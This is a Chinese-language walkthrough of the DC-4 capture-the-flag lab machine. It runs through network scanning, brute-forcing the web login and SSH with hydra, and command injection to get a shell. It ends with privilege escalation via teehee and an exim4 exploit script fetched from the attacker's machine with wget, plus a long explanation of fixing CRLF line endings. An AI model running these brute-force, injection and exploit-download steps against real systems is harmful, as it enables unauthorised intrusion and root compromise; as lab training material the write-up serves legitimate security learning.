dc-4(exim4提权)
靶机下载地址:dc-4
找靶机
nmap -sV 192.168.6.0/24
查看一下端口服务
很明显就只是一个简单的登录框
我们爆破一下
最终得到用户名:admin 密码:happy
进去看看怎么个事
很明显是一个选择既定的命令进行命令执行
我们可以抓包然后即可使用我们自己设计的命令
直接拿shell
然后再实现交互
python -c "import pty;pty.spawn('/bin/bash')"
经过一系列探索我们发现在home目录下有一个jim用户里面有可疑文件
怀疑是让我们去爆破此用户的密码
我们吧此可疑文件的内容保存去用来爆破密码即可
hydra -l jim.txt -p jim -vV ssh://192.168.6.130
成功爆出登陆即可
登陆后发现了存在邮件
查看是否有可疑信息
结果又发现一个用户很简单了我们直接登陆即可
(邮件在/var/spool/mail)
登陆后经过一系列探索发现发现可以teehee提权
成功
后来又发现一种新方法
就是直接在
获得shell之后直接suid进行提权即可
先查询可利用的文件
find / -perm -u=s -type f 2>/dev/null
可利用exim4来进行提权
首先我们先去本地漏洞库进行查看
searchsploit exim 4
发现符合的利用程序
先将其放到我们kali上
再在/var/www/html目录下使用命令
systemctl start apache2.service
命令作用:
当你执行 systemctl start apache2.service 时,它会尝试启动 Apache Web 服务器。如果 Apache 服务器已经安装但没有启动,该命令会启动它,并使其开始监听 HTTP 请求,通常是在默认的 80 端口(HTTP)或 443 端口(HTTPS)。
然后我们即可用靶机直接
wget http://kali的ip/46996.sh
即可成功获得文件
加上权限直接执行即可获得权限
如果失败下面是原因:
在 Linux 环境下执行 shell 脚本时,脚本的格式必须符合 Unix 系统的标准。如果脚本格式为 DOS(Windows)的格式,可能会出现执行错误,导致提权失败。通常问题的根源是 Windows 和 Unix 系统使用不同的换行符。
1. 问题的原因:DOS 和 Unix 换行符的区别
Unix/Linux 换行符:\n(Line Feed,简称 LF)
Windows/DOS 换行符:\r\n(Carriage Return + Line Feed,简称 CRLF)
如果一个脚本是从 Windows 系统中创建或编辑的,它的换行符可能是 CRLF 格式。Linux 在执行带有 CRLF 换行符的脚本时,可能会因为换行符格式不兼容而无法正确执行,导致错误如:
/bin/bash^M: bad interpreter: No such file or directory
这个 ^M 是由于 DOS 格式的 CR 字符导致的。
2. 解决方法:转换为 Unix 格式
要解决这个问题,必须将脚本的换行符从 DOS 格式(CRLF)转换为 Unix 格式(LF)。有多种方式可以实现这一点:
方法 1:使用 Vim 进行转换
Vim 编辑器可以轻松地将文件格式转换为 Unix 格式。你提到的解决方法正是通过 Vim 实现的,步骤如下:
打开脚本文件:
vim shell.sh
转换文件格式: 在 Vim 中输入以下命令:
:set ff=unix
这里的 ff 代表 fileformat,设置为 unix 后,Vim 会将文件的换行符转换为 Unix 格式。
保存并退出: 按 Esc,然后输入以下命令保存并退出 Vim:
:wq
这将确保文件的换行符为 Unix 格式,使得在 Linux 系统中执行时不再出现换行符兼容性的问题。
方法 2:使用 dos2unix 工具
如果不想用 Vim 编辑器,你可以使用专门的工具 dos2unix 来转换文件格式。
安装 dos2unix(如果未安装):
sudo apt-get install dos2unix
转换脚本文件:
dos2unix shell.sh
这会将文件的换行符从 DOS 格式转换为 Unix 格式。
方法 3:使用 sed 命令
你也可以通过 sed 命令来删除 CR 字符:
sed -i 's/\r$//' shell.sh
这条命令会将脚本中的 \r(CR)删除,从而转换为 Unix 格式。
3. 提权流程
在靶机中,由于最初脚本的格式是 DOS 格式,导致无法正确执行。执行以下步骤可以解决问题并成功提权:
在攻击机中修改 shell 脚本:确保脚本的格式为 Unix 格式。
使用 Vim 编辑器的 :set ff=unix 或其他工具(如 dos2unix)将文件格式转换为 Unix。
重新下载脚本到靶机:在靶机中,通过网络(如使用 wget 或 scp)下载修改后的脚本。
赋予执行权限:在靶机中,使用 chmod 命令赋予脚本执行权限:
chmod +x shell.sh
执行脚本进行提权:运行脚本,成功提权:
./shell.sh
获得最终的 flag:执行成功后,获得系统权限并读取系统中的 flag 文件。
总结
提权失败的原因是由于 shell.sh 文件使用了 DOS 格式,Linux 无法执行带有 CRLF 换行符的脚本。
通过将文件的格式转换为 Unix 格式(LF 换行符),解决了换行符兼容性的问题。
在靶机中重新下载修改后的脚本并赋予执行权限,成功执行脚本完成提权,获得最终的 flag。
这个问题在跨平台开发环境中(如从 Windows 到 Linux 传输文件)非常常见,解决方法是确保文件格式与目标平台兼容。